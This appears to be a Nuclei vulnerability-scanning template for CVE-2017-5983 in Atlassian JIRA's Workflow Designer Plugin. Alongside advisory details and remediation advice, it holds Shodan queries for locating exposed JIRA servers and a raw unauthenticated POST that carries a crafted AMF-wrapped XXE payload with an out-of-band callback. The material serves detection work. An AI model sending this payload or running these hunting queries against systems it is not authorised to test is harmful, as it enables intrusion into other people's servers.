The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
PoC代码[已公开]
id: CVE-2017-5983
info:
name: JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE)
author: us3r777,Synacktiv
severity: critical
description: |
The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
impact: |
Unauthenticated attackers can execute arbitrary code on the server, read arbitrary files, or cause denial of service, potentially leading to complete server compromise.
remediation: |
Upgrade to JIRA Server version 6.3.0 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-5983
- https://code-white.com/blog/2017-04-amf/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-5983
cwe-id: CWE-502
epss-score: 0.08385
epss-percentile: 0.9207
cpe: cpe:2.3:a:atlassian:jira:4.2.4:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: atlassian
product: jira
shodan-query:
- http.title:"system dashboard - jira"
- cpe:"cpe:2.3:a:atlassian:jira"
- http.component:"atlassian confluence"
- http.component:"atlassian jira"
tags: cve,cve2017,jira,amf,rce,xxe,vuln
variables:
version: "\x00\x00"
header_count: "\x00\x00"
message_count: "\x00\x01"
target_uri: "test"
target_uri_len: "\x00\x04"
response_uri: "test"
response_uri_len: "\x00\x04"
xml_marker: "\x0f"
xxe_payload: '<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://{{interactsh-url}}/amf"> %ext; ]>'
int: "0000"
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/secure/Dashboard.jspa"
- "{{BaseURL}}/jira/secure/Dashboard.jspa"
- "{{BaseURL}}/login.jsp"
stop-at-first-match: true
host-redirects: true
matchers:
- type: word
part: body
words:
- 'title="JiraVersion"'
internal: true
- raw:
- |
POST /plugins/servlet/jwd/amf/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
Content-Length: {{len(xxe_payload)+29}}
{{version}}{{header_count}}{{message_count}}{{target_uri_len}}{{target_uri}}{{response_uri_len}}{{response_uri}}{{url_decode(concat("%00%00%00%",dec_to_hex(len(concat(int,xml_marker,xxe_payload)))))}}{{xml_marker}}{{url_decode(concat("%00%00%00%",dec_to_hex(len(concat(xxe_payload)))))}}{{xxe_payload}}
unsafe: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4a0a004730450220439aa2c821489ed16bd26784e9170d522dd0acb1de8a4dccce38f37301b376bc022100cdb7037558829faf2071c75352e9cef05a668f8cd8df3dab8ae4f9c7a9b41966:922c64590222798bb761d5b6d8e72950